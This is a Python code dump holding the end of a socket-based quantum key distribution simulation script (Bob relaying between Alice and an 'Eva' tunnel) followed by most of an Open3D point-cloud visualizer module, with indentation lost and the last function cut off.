print "Received Alice's bases"
print "bases: " + AliceMbits
AliceM= pickle.loads(AliceMbits)
BobM = BobClass.Bob(blocks)
ResultM= AliceM.Measure(BobM)
ResultMbits = pickle.dumps(ResultM)
socketeva.send(ResultMbits)
print "Sent State to Tunnel"
consbits = socketeva.recv(47*(1+blocks)/2)
print "Received Coincidences from Eva"
socketalice.send(consbits)
print "Sent Coincidences To Alice"
cons = pickle.loads(consbits)
newkey = BobM.KeyBob(ResultM,cons)
key= int("0b"+"".join(str(i) for i in newkey),2)
done = socketalice.recv(1024)
socketeva.send(done)
done = socketeva.recv(1024)
socketalice.send(done)
print done
print "Key Updated; new key: " + bin(key)
stop_receivingeva.clear()
stop_receivingbob.clear()
stop_updating.set()
start_clock.set()
start_updating.clear()
rLock.release()
return key
except:
print "Update Failed"
stop_receivingbob.clear()
stop_receivingeva.clear()
stop_updating.set()
start_clock.set()
start_updating.clear()
return 1
while not breaking:
uk()
if breakingevent.is_set():
breaking = True
socket.close()
if True:
blocks=int(raw_input('give me blocks: '))
delay = 10
connecttoeva = threading.Event()
connecttoalice = threading.Event()
start_updating = threading.Event()
stop_receivingeva = threading.Event()
stop_receivingbob = threading.Event()
stop_updating=threading.Event()
start_clock = threading.Event()
breakevent = threading.Event()
Tunnel = threading.Thread(target=EvaTunnel, args=(blocks,connecttoeva, connecttoalice,start_updating,stop_updating,stop_receivingeva,stop_receivingbob,breakevent))
Tunnel.start()
connecttoeva.wait()
hostEva='192.168.0.18'
portEva = 5001
seva = socket.socket()
seva.connect((hostEva,portEva))
connecttoalice.wait()
hostAlice='192.168.0.18'
portAlice = 5000
salice = socket.socket()
salice.connect((hostAlice,portAlice))
receivedfromtunnel = threading.Event()
receivedfromalice = threading.Event()
stop_receivingfromtunnel = threading.Event()
stop_receivingfromalice = threading.Event()
qdatatunnel = Queue.Queue()
qdataalice = Queue.Queue()
RFTT = threading.Thread(target=ReceiveFrom, args = (blocks,seva,receivedfromtunnel,start_updating,stop_receivingfromtunnel,stop_updating,qdatatunnel,"Tunnel",breakevent,True))
RFAT = threading.Thread(target=ReceiveFrom, args = (blocks,salice,receivedfromalice,start_updating,stop_receivingfromalice,stop_updating,qdataalice,"Alice",breakevent, True))
RFTT.start()
RFAT.start()
uT = threading.Thread(target=UpdateKey, args=(blocks,salice,seva,stop_receivingbob,stop_receivingeva,stop_receivingfromtunnel,stop_receivingfromalice,stop_updating,start_updating,start_clock,breakevent))
uT.start()
stop_updating.set()
start_clock.set()
while not breaking:
if receivedfromalice.is_set():
datatunnel = qdatatunnel.get()
seva.send(datatunnel)
print "Sent to Tunnel"
receivedfromalice.clear()
if receivedfromtunnel.is_set():
dataalice = qdataalice.get()
salice.send(dataalice)
print "Sent to Alice"
receivedfromtunnel.clear()
if breakevent.is_set():
breaking = True
uT.join()
RFTT.join()
RFAT.join()
salice.close()
seva.close()
|
visualizer.py
|
import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
"""The class that helps build visualization models based on attributes,
data, and methods.
"""
bounding_box_prefix = "Bounding Boxes/"
class BoundingBoxData:
"""The class to define a bounding box that is used to describe the
target location.
Args:
name: The name of the pointcloud array.
boxes: The array of pointcloud that define the bounding box.
"""
def __init__(self, name, boxes):
self.name = name
self.boxes = boxes
def __init__(self):
# Note: the tpointcloud cannot store the actual data arrays, because
# the tpointcloud requires specific names for some arrays (e.g. "points",
# "colors"). So the tpointcloud exists for rendering and initially only
# contains the "points" array.
self.tclouds = {} # name -> tpointcloud
self.data_names = [] # the order data will be displayed / animated
self.bounding_box_data = [] # [BoundingBoxData]
self._data = {} # name -> {attr_name -> numpyarray}
self._known_attrs = {} # name -> set(attrs)
self._attr2minmax = {} # only access in _get_attr_minmax()
self._attr_rename = {"label": "labels", "feat": "feature"}
def _init_data(self, name):
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
self.data_names.append(name)
def is_loaded(self, name):
"""Check if the data is loaded."""
if name in self._data:
return len(self._data[name]) > 0
else:
# if the name isn't in the data, presumably it is loaded
# (for instance, if this is a bounding box).
return True
def load(self, name, fail_if_no_space=False):
"""If data is not loaded, then load the data."""
assert (False) # pure virtual
def unload(self, name):
assert (False) # pure virtual
def create_point_cloud(self, data):
"""Create a point cloud based on the data provided.
The data should include name and points.
"""
assert ("name" in data) # name is a required field
assert ("points" in data) # 'points' is a required field
name = data["name"]
pts = self._convert_to_numpy(data["points"])
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
known_attrs = set()
if pts.shape[1] >= 4:
# We can't use inplace Tensor creation (e.g. from_numpy())
# because the resulting arrays won't be contiguous. However,
# TensorList can be inplace.
xyz = pts[:, [0, 1, 2]]
tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
copy=True)
else:
tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
self.tclouds[name] = tcloud
# Add scalar attributes and vector3 attributes
attrs = {}
for k, v in data.items():
attr = self._convert_to_numpy(v)
if attr is None:
continue
attr_name = k
if attr_name == "point":
continue
new_name = self._attr_rename.get(attr_name)
if new_name is not None:
attr_name = new_name
if len(attr.shape) == 1 or len(attr.shape) == 2:
attrs[attr_name] = attr
known_attrs.add(attr_name)
self._data[name] = attrs
self._known_attrs[name] = known_attrs
def _convert_to_numpy(self, ary):
if isinstance(ary, list):
try:
return np.array(ary, dtype='float32')
except TypeError:
return None
elif isinstance(ary, np.ndarray):
if len(ary.shape) == 2 and ary.shape[0] == 1:
ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
if ary.dtype.name.startswith('int'):
return np.array(ary, dtype='float32')
else:
return ary
try:
import tensorflow as tf
if isinstance(ary, tf.Tensor):
return self._convert_to_numpy(ary.numpy())
except:
pass
try:
import torch
if isinstance(ary, torch.Tensor):
return self._convert_to_numpy(ary.detach().cpu().numpy())
except:
pass
return None
def get_attr(self, name, attr_name):
"""Get an attribute from data based on the name passed."""
if name in self._data:
attrs = self._data[name]
if attr_name in attrs:
return attrs[attr_name]
return None
def get_attr_shape(self, name, attr_name):
"""Get a shape from data based on the name passed."""
attr = self.get_attr(name, attr_name)
if attr is not None:
return attr.shape
return []
def get_attr_minmax(self, attr_name, channel):
"""Get the minimum and maximum for an attribute."""
attr_key_base = attr_name + ":" + str(channel)
attr_min = 1e30
attr_max = -1e30
for name in self._data.keys():
key = name + ":" + attr_key_base
if key not in self._attr2minmax:
attr = self.get_attr(name, attr_name)
if attr is None: # clouds may not have all the same attributes
continue
if len(attr.shape) > 1:
attr = attr[:, channel]
self._attr2minmax[key] = (attr.min(), attr.max())
amin, amax = self._attr2minmax[key]
attr_min = min(attr_min, amin)
attr_max = max(attr_max, amax)
if attr_min > attr_max:
return (0.0, 0.0)
return (attr_min, attr_max)
def get_available_attrs(self, names):
"""Get a list of attributes based on the name."""
attr_names = None
for n in names:
known = self._known_attrs.get(n)
if known is not None:
if attr_names is None:
attr_names = known
else:
attr_names = attr_names.intersection(known)
if attr_names is None:
return []
return sorted(attr_names)
def calc_bounds_for(self, name):
"""Calculate the bounds for a pointcloud."""
if name in self.tclouds and not self.tclouds[name].is_empty():
tcloud = self.tclouds[name]
# Ideally would simply return tcloud.compute_aabb() here, but it can
# be very slow on macOS with clang 11.0
pts = tcloud.point["points"].numpy()
min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
return [min_val, max_val]
else:
return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
"""The class for data i/o and storage of visualization.
Args:
userdata: The dataset to be used in the visualization.
"""
def __init__(self, userdata):
super().__init__()
# We could just create the TPointCloud here, but that would cause the UI
# to block. If we do it on load then the loading dialog will display.
self._name2srcdata = {}
for d in userdata:
name = d["name"]
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2srcdata[name] = d
def load(self, name, fail_if_no_space=False):
"""Load a pointcloud based on the name provided."""
if self.is_loaded(name):
return
self.create_point_cloud(self._name2srcdata[name])
def unload(self, name):
"""Unload a pointcloud."""
pass
class DatasetModel(Model):
"""The class used to manage a dataset model.
Args:
dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets , or a custom dataset.
split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
indices: The indices to be used for the datamodel. This may vary based on the split used.
"""
def __init__(self, dataset, split, indices):
super().__init__()
self._dataset = None
self._name2datasetidx = {}
self._memory_limit = 8192 * 1024 * 1024 # memory limit in bytes
self._current_memory_usage = 0
self._cached_data = deque()
self._dataset = dataset.get_split(split)
if len(self._dataset) > 0:
if indices is None:
indices = range(0, len(self._dataset))
# Some results from get_split() (like "training") are randomized.
# Sort, so that the same index always returns the same piece of data.
path2idx = {}
for i in range(0, len(self._dataset.path_list)):
path2idx[self._dataset.path_list[i]] = i
real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
indices = [real_indices[idx] for idx in indices]
# SemanticKITTI names its items <sequence#>_<timeslice#>,
# "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
# to separate the sequences. We cannot change the name in the dataset
# because this format is used to report algorithm results, so do it
# here.
underscore_to_slash = False
if dataset.__class__.__name__ == "SemanticKITTI":
underscore_to_slash = True
for i in indices:
info = self._dataset.get_attr(i)
name = info["name"]
if underscore_to_slash:
name = name.replace("_", "/")
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2datasetidx[name] = i
if dataset.__class__.__name__ in [
"Toronto3D", "Semantic3D", "S3DIS"
]:
self._attr_rename["feat"] = "colors"
self._attr_rename["feature"] = "colors"
else:
print("[ERROR] Dataset split has no data")
def is_loaded(self, name):
"""Check if the data is loaded."""
loaded = super().is_loaded(name)
if loaded and name in self._cached_data:
# make this point cloud the most recently used
self._cached_data.remove(name)
self._cached_data.append(name)
return loaded
def load(self, name, fail_if_no_space=False):
"""Check if data is not loaded, and then load the data."""
assert (name in self._name2datasetidx)
if self.is_loaded(name):
return True
idx = self._name2datasetidx[name]
data = self._dataset.get_data(idx)
data["name"] = name
data["points"] = data["point"]
if 'bounding_boxes' in data:
self.bounding_box_data.append(
Model.BoundingBoxData(name, data['bounding_boxes']))
self.create_point_cloud(data)
size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
if size + self._current_memory_usage > self._memory_limit:
if fail_if_no_space:
self.unload(name)
return False
else:
# Remove oldest from cache
remove_name = self._cached_data.popleft()
remove_size = self._calc_pointcloud_size(
self._data[remove_name], self.tclouds[remove_name])
self._current_memory_usage -= remove_size
self.unload(remove_name)
# Add new point cloud to cache
self._cached_data.append(name)
self._current_memory_usage += size
return True
else:
self._current_memory_usage += size
self._cached_data.append(name)
return True
def _calc_pointcloud_size(self, raw_data, pcloud):
"""Calcute the size of the pointcloud based on the rawdata."""
pcloud_size = 0
for (attr, arr) in raw_data.items():
pcloud_size += arr.size * 4
# Point cloud consumes 64 bytes of per point of GPU memory
pcloud_size += pcloud.point["points"].num_elements() * 64
return pcloud_size
def unload(self, name):
"""Unload the data (if it was loaded earlier)."""
# Only unload if this was loadable; we might have an in-memory,
# user-specified data created directly through create_point_cloud().
if name in self._name2datasetidx:
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
bbox_name = Model.bounding_box_prefix + name
for i in range(0, len(self.bounding_box_data)):
if self.bounding_box_data[i].name == bbox_name:
self.bounding_box_data.pop(i)
break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
class LabelLUTEdit:
"""This class includes functionality for managing a labellut (label
look-up-table).
"""
def __init__(self):
self.widget = gui.TreeView()
self._on_changed = None # takes no args, returns no value
self.clear()
def clear(self):
"""Clears the look-up table."""
self.widget.clear()
self._label2color = {}
def is_empty(self):
"""Checks if the look-up table is empty."""
return len(self._label2color) == 0
def get_colors(self):
"""Returns a list of label keys."""
return [
self._label2color[label]
for label in sorted(self._label2color.keys())
]
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
def set_labels(self, labellut):
"""Updates the labels based on look-up table passsed."""
self.widget.clear()
root = self.widget.get_root_item()
for key in sorted(labellut.labels.keys()):
lbl = labellut.labels[key]
color = lbl.color
if len(color) == 3:
color += [1.0]
self._label2color[key] = color
color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
cell = gui.LUTTreeCell(
str(key) + ": " + lbl.name, True, color, None, None)
cell.checkbox.set_on_checked(
self._make_on_checked(key, self._on_label_checked))
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(key,
self._on_label_color_changed))
self.widget.add_item(root, cell)
def _make_on_color_changed(self, label, member_func):
def on_changed(color):
member_func(label, color)
return on_changed
def _on_label_color_changed(self, label, gui_color):
self._label2color[label] = [
gui_color.red, gui_color.green, gui_color.blue,
self._label2color[label][3]
]
if self._on_changed is not None:
self._on_changed()
def _make_on_checked(self, label, member_func):
def on_checked(checked):
member_func(label, checked)
return on_checked
def _on_label_checked(self, label, checked):
if checked:
alpha = 1.0
else:
alpha = 0.0
color = self._label2color[label]
self._label2color[label] = [color[0], color[1], color[2], alpha]
if self._on_changed is not None:
self._on_changed()
class ColormapEdit:
"""This class is used to create a color map for visualization of
points.
"""
def __init__(self, window, em):
self.colormap = None
self.widget = gui.Vert()
self._window = window
self._min_value = 0.0
self._max_value = 1.0
self._on_changed = None # takes no args, no return value
self._itemid2idx = {}
self._min_label = gui.Label("")
self._max_label = gui.Label("")
grid = gui.VGrid(2)
grid.add_child(gui.Label("Range (min):"))
grid.add_child(self._min_label)
grid.add_child(gui.Label("Range (max):"))
grid.add_child(self._max_label)
self.widget.add_child(grid)
self.widget.add_fixed(0.5 * em)
self.widget.add_child(gui.Label("Colormap"))
self._edit = gui.TreeView()
self._edit.set_on_selection_changed(self._on_selection_changed)
self.widget.add_child(self._edit)
self._delete = gui.Button("Delete")
self._delete.horizontal_padding_em = 0.5
self._delete.vertical_padding_em = 0
self._delete.set_on_clicked(self._on_delete)
self._add = gui.Button("Add")
self._add.horizontal_padding_em = 0.5
self._add.vertical_padding_em = 0
self._add.set_on_clicked(self._on_add)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._delete)
h.add_fixed(0.25 * em)
h.add_child(self._add)
h.add_stretch()
self.widget.add_fixed(0.5 * em)
self.widget.add_child(h)
self.widget.add_fixed(0.5 * em)
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
def update(self, colormap, min_val, max_val):
"""Updates the colormap based on the minimum and maximum values
passed.
"""
self.colormap = colormap
self._min_value = min_val
self._max_value = max_val
self._min_label.text = str(min_val)
self._max_label.text = str(max_val)
if self._min_value >= self._max_value:
self._max_value = self._min_value + 1.0
self._edit.clear()
self._itemid2idx = {}
root_id = self._edit.get_root_item()
for i in range(0, len(self.colormap.points)):
p = self.colormap.points[i]
color = gui.Color(p.color[0], p.color[1], p.color[2])
val = min_val + p.value * (max_val - min_val)
cell = gui.ColormapTreeCell(val, color, None, None)
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(i, self._on_color_changed))
cell.number_edit.set_on_value_changed(
self._make_on_value_changed(i, self._on_value_changed))
item_id = self._edit.add_item(root_id, cell)
self._itemid2idx[item_id] = i
self._update_buttons_enabled()
def _make_on_color_changed(self, idx, member_func):
def on_changed(color):
member_func(idx, color)
return on_changed
def _on_color_changed(self, idx, gui_color):
self.colormap.points[idx].color = [
gui_color.red, gui_color.green, gui_color.blue
]
if self._on_changed is not None:
self._on_changed()
def _make_on_value_changed(self, idx, member_func):
def on_changed(value):
member_func(idx, value)
return on_changed
def _on_value_changed(self, idx, value):
value = (value - self._min_value) / (self._max_value -
self._min_value)
needs_update = False
value = min(1.0, max(0.0, value))
if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
(idx < len(self.colormap.points) - 1 and
value > self.colormap.points[idx + 1].value)):
self.colormap.points[idx].value = value
o = self.colormap.points[idx]
self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
for i in range(0, len(self.colormap.points)):
if self.colormap.points[i] is o:
idx = i
break
needs_update = True
if idx > 0 and value == self.colormap.points[idx - 1].value:
if idx < len(self.colormap.points):
upper = self.colormap.points[idx + 1].value
else:
upper = 1.0
value = value + 0.5 * (upper - value)
needs_update = True
if idx < len(self.colormap.points
) - 1 and value == self.colormap.points[idx + 1].value:
if idx > 0:
lower = self.colormap.points[idx - 1].value
else:
lower = 0.0
value = lower + 0.5 * (value - lower)
needs_update = True
self.colormap.points[idx].value = value
if needs_update:
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_selection_changed(self, item_id):
self._update_buttons_enabled()
def _on_delete(self):
if len(self.colormap.points) > 2:
idx = self._itemid2idx[self._edit.selected_item]
self.colormap.points = self.colormap.points[:
idx] + self.colormap.points[
idx + 1:]
del self._itemid2idx[self._edit.selected_item]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_add(self):
if self._edit.selected_item in self._itemid2idx: # maybe no selection
idx = self._itemid2idx[self._edit.selected_item]
if idx < len(self.colormap.points) - 1:
lower = self.colormap.points[idx]
upper = self.colormap.points[idx + 1]
else:
lower = self.colormap.points[len(self.colormap.points) - 2]
upper = self.colormap.points[len(self.colormap.points) - 1]
add_idx = min(idx + 1, len(self.colormap.points) - 1)
new_value = lower.value + 0.5 * (upper.value - lower.value)
new_color = [
0.5 * lower.color[0] + 0.5 * upper.color[0],
0.5 * lower.color[1] + 0.5 * upper.color[1],
0.5 * lower.color[2] + 0.5 * upper.color[2]
]
new_point = Colormap.Point(new_value, new_color)
self.colormap.points = self.colormap.points[:add_idx] + [
new_point
] + self.colormap.points[add_idx:]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _update_buttons_enabled(self):
if self._edit.selected_item in self._itemid2idx:
self._delete.enabled = len(self.colormap.points) > 2
self._add.enabled = True
else:
self._delete.enabled = False
self._add.enabled = False
def _update_later(self):
def update():
self.update(self.colormap, self._min_value, self._max_value)
self._window.post_redraw() # need to manually request redraw
gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
"""This class is used to manage the progress dialog displayed during
visualization.
Args:
title: The title of the dialog box.
window: The window where the progress dialog box should be displayed.
n_items: The maximum number of items.
"""
def __init__(self, title, window, n_items):
self._window = window
self._n_items = n_items
em = window.theme.font_size
self.dialog = gui.Dialog(title)
self._label = gui.Label(title + " ")
self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
self.dialog.add_child(self._layout)
self._layout.add_child(self._label)
self._layout.add_fixed(0.5 * em)
self._progress = gui.ProgressBar()
self._progress.value = 0.0
self._layout.add_child(self._progress)
def set_text(self, text):
"""Set the label text on the dialog box."""
self._label.text = text + " "
def post_update(self, text=None):
"""Post updates to the main thread."""
if text is None:
gui.Application.instance.post_to_main_thread(
self._window, self.update)
else:
def update_with_text():
self.update()
self._label.text = text
gui.Application.instance.post_to_main_thread(
self._window, update_with_text)
def update(self):
"""Enumerate the progress in the dialog box."""
value = min(1.0, self._progress.value + 1.0 / self._n_items)
self._progress.value = value
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
def __init__(self):
self._objects = None
self._name2treenode = {}
self._name2treeid = {}
self._treeid2name = {}
self._attrname2lut = {}
self._colormaps = {}
self._shadername2panelidx = {}
self._gradient = rendering.Gradient()
self._scalar_min = 0.0
self._scalar_max = 1.0
self._animation_frames = []
self._last_animation_time = time.time()
self._animation_delay_secs = 0.100
self._consolidate_bounding_boxes = False
self._dont_update_geometry = False
def _init_dataset(self, dataset, split, indices):
self._objects = DatasetModel(dataset, split, indices)
def _init_data(self, data):
self._objects = DataModel(data)
def _init_user_interface(self, title, width, height):
self.window = gui.Application.instance.create_window(
title, width, height)
self.window.set_on_layout(self._on_layout)
em = self.window.theme.font_size
self._3d = gui.SceneWidget()
self._3d.enable_scene_caching(True) # makes UI _much_ more responsive
self._3d.scene = rendering.Open3DScene(self.window.renderer)
self.window.add_child(self._3d)
self._panel = gui.Vert()
self.window.add_child(self._panel)
indented_margins = gui.Margins(em, 0, em, 0)
# View controls
ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)
arcball = gui.Button("Arcball")
arcball.set_on_clicked(self._on_arcball_mode)
arcball.horizontal_padding_em = 0.5
arcball.vertical_padding_em = 0
fly = gui.Button("Fly")
fly.set_on_clicked(self._on_fly_mode)
fly.horizontal_padding_em = 0.5
fly.vertical_padding_em = 0
reset = gui.Button("Re-center")
reset.set_on_clicked(self._on_reset_camera)
reset.horizontal_padding_em = 0.5
reset.vertical_padding_em = 0
h = gui.Horiz(0.25 * em)
h.add_stretch()
h.add_child(arcball)
h.add_child(fly)
h.add_fixed(em)
h.add_child(reset)
h.add_stretch()
ctrl.add_child(h)
ctrl.add_fixed(em)
self._panel.add_child(ctrl)
# Dataset
model = gui.CollapsableVert("Dataset", 0, indented_margins)
vgrid = gui.VGrid(2, 0.25 * em)
model.add_child(vgrid)
model.add_fixed(0.5 * em)
bgcolor = gui.ColorEdit()
bgcolor.color_value = gui.Color(1, 1, 1)
self._on_bgcolor_changed(bgcolor.color_value)
bgcolor.set_on_value_changed(self._on_bgcolor_changed)
vgrid.add_child(gui.Label("BG Color"))
vgrid.add_child(bgcolor)
view_tab = gui.TabControl()
view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
model.add_child(view_tab)
# ... model list
self._dataset = gui.TreeView()
self._dataset.set_on_selection_changed(
self._on_dataset_selection_changed)
view_tab.add_tab("List", self._dataset)
# ... animation slider
v = gui.Vert()
view_tab.add_tab("Animation", v)
v.add_fixed(0.25 * em)
grid = gui.VGrid(2)
v.add_child(grid)
self._slider = gui.Slider(gui.Slider.INT)
self._slider.set_limits(0, len(self._objects.data_names))
self._slider.set_on_value_changed(self._on_animation_slider_changed)
grid.add_child(gui.Label("Index"))
grid.add_child(self._slider)
self._slider_current = gui.Label("")
grid.add_child(gui.Label("Showing"))
grid.add_child(self._slider_current)
v.add_fixed(em)
self._play = gui.Button("Play")
self._play.horizontal_padding_em = 0.5
self._play.vertical_padding_em = 0
self._play.set_on_clicked(self._on_start_animation)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._play)
h.add_stretch()
v.add_child(h)
self._panel.add_child(model)
# Coloring
properties = gui.CollapsableVert("Properties", 0, indented_margins)
grid = gui.VGrid(2, 0.25 * em)
# ... data source
self._datasource_combobox = gui.Combobox()
self._datasource_combobox.set_on_selection_changed(
self._on_datasource_changed)
self._colormap_channel = gui.Combobox()
self._colormap_channel.add_item("0")
self._colormap_channel.set_on_selection_changed(
self._on_channel_changed)
h = gui.Horiz()
h.add_child(self._datasource_combobox)
h.add_fixed(em)
h.add_child(gui.Label("Index"))
h.add_child(self._colormap_channel)
grid.add_child(gui.Label("Data"))
grid.add_child(h)
# ... shader
self._shader = gui.Combobox()
self._shader.add_item(self.SOLID_NAME)
self._shader.add_item(self.LABELS_NAME)
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.COLOR_NAME)
self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
self._shader.selected_index = 0
self._shader.set_on_selection_changed(self._on_shader_changed)
grid.add_child(gui.Label("Shader"))
grid.add_child(self._shader)
properties.add_child(grid)
# ... shader panels
self._shader_panels = gui.StackedWidget()
panel_idx = 0
# ... sub-panel: single color
self._color_panel = gui.Vert()
self._shader_panels.add_child(self._color_panel)
self._shadername2panelidx[self.SOLID_NAME] = panel_idx
panel_idx += 1
self._color = gui.ColorEdit()
self._color.color_value = gui.Color(0.5, 0.5, 0.5)
self._color.set_on_value_changed(self._on_shader_color_changed)
h = gui.Horiz()
h.add_child(gui.Label("Color"))
h.add_child(self._color)
self._color_panel.add_child(h)
# ... sub-panel: labels
self._labels_panel = gui.Vert()
self._shader_panels.add_child(self._labels_panel)
self._shadername2panelidx[self.LABELS_NAME] = panel_idx
panel_idx += 1
self._label_edit = self.LabelLUTEdit()
self._label_edit.set_on_changed(self._on_labels_changed)
self._labels_panel.add_child(gui.Label("Labels"))
self._labels_panel.add_child(self._label_edit.widget)
# ... sub-panel: colormap
self._colormap_panel = gui.Vert()
self._shader_panels.add_child(self._colormap_panel)
self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
panel_idx += 1
self._colormap_edit = self.ColormapEdit(self.window, em)
self._colormap_edit.set_on_changed(self._on_colormap_changed)
self._colormap_panel.add_child(self._colormap_edit.widget)
# ... sub-panel: RGB
self._rgb_panel = gui.Vert()
self._shader_panels.add_child(self._rgb_panel)
self._shadername2panelidx[self.COLOR_NAME] = panel_idx
panel_idx += 1
self._rgb_combo = gui.Combobox()
self._rgb_combo.add_item("255")
self._rgb_combo.add_item("1.0")
self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
h = gui.Horiz(0.5 * em)
h.add_child(gui.Label("Max value"))
h.add_child(self._rgb_combo)
self._rgb_panel.add_child(h)
properties.add_fixed(em)
properties.add_child(self._shader_panels)
self._panel.add_child(properties)
# Populate tree, etc.
for name in self._objects.data_names:
self._add_tree_name(name)
self._update_datasource_combobox()
def set_lut(self, attr_name, lut):
"""Set the LUT for a specific attribute.
Args:
attr_name: The attribute name as string.
lut: The LabelLUT object that should be updated.
"""
self._attrname2lut[attr_name] = lut
def setup_camera(self):
"""Set up camera for visualization."""
selected_names = self._get_selected_names()
selected_bounds = [
self._objects.calc_bounds_for(n) for n in selected_names
]
min_val = [1e30, 1e30, 1e30]
max_val = [-1e30, -1e30, -1e30]
for b in selected_bounds:
for i in range(0, 3):
min_val[i] = min(min_val[i], b[0][i])
max_val[i] = max(max_val[i], b[1][i])
bounds = o3d.geometry.AxisAlignedBoundingBox(min_val, max_val)
self._3d.setup_camera(60, bounds, bounds.get_center())
def show_geometries_under(self, name, show):
"""Show geometry for a given node."""
prefix = name
for (n, node) in self._name2treenode.items():
if n.startswith(prefix):
self._3d.scene.show_geometry(n, show)
node.checkbox.checked = show
self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
names = name.split("/")
parent = self._dataset.get_root_item()
for i in range(0, len(names) - 1):
n = "/".join(names[:i + 1]) + "/"
if n in self._name2treeid:
parent = self._name2treeid[n]
else:
def on_parent_checked(checked):
self.show_geometries_under(n, checked)
cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
parent = self._dataset.add_item(parent, cell)
self._name2treenode[n] = cell
self._name2treeid[n] = parent
self._treeid2name[parent] = n
def on_checked(checked):
self._3d.scene.show_geometry(name, checked)
if self._is_tree_name_geometry(name):
# available attrs could change
self._update_datasource_combobox()
self._update_bounding_boxes()
self._3d.force_redraw()
cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
if is_geometry:
cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
node = self._dataset.add_item(parent, cell)
self._name2treenode[name] = cell
self._treeid2name[node] = name
self._slider.set_limits(0, len(self._objects.data_names) - 1)
if len(self._objects.data_names) == 1:
self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
progress_dlg.set_text("Loading " + name + "...")
def load_thread():
result = self._objects.load(name)
progress_dlg.post_update("Loading " + name + "...")
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _load_geometries(self, names, ui_done_callback):
# Progress has: len(names) items + ui_done_callback
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
len(names) + 1)
progress_dlg.set_text("Loading " + names[0] + "...")
def load_thread():
for i in range(0, len(names)):
result = self._objects.load(names[i], True)
if i + 1 < len(names):
text = "Loading " + names[i + 1] + "..."
else:
text = "Creating GPU objects..."
progress_dlg.post_update(text)
if result:
self._name2treenode[names[i]].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
else:
break
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _update_geometry(self, check_unloaded=False):
if check_unloaded:
for name in self._objects.data_names:
if not self._objects.is_loaded(name):
self._3d.scene.remove_geometry(name)
material = self._get_material()
for n, tcloud in self._objects.tclouds.items():
self._update_point_cloud(n, tcloud, material)
if not tcloud.is_empty():
self._name2treenode[n].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
if self._3d.scene.has_geometry(n):
self._3d.scene.modify_geometry_material(n, material)
else:
self._name2treenode[n].label.text_color = gui.Color(
1.0, 0.0, 0.0, 1.0)
self._name2treenode[n].checkbox.checked = False
self._3d.force_redraw()
def _update_point_cloud(self, name, tcloud, material):
if self._dont_update_geometry:
return
if tcloud.is_empty():
return
attr_name = self._datasource_combobox.selected_text
attr = None
flag = 0
attr = self._objects.get_attr(name, attr_name)
# Update scalar values
if attr is not None:
if len(attr.shape) == 1:
scalar = attr
else:
channel = max(0, self._colormap_channel.selected_index)
scalar = attr[:, channel]
else:
shape = [len(tcloud.point["points"].numpy())]
scalar = np.zeros(shape, dtype='float32')
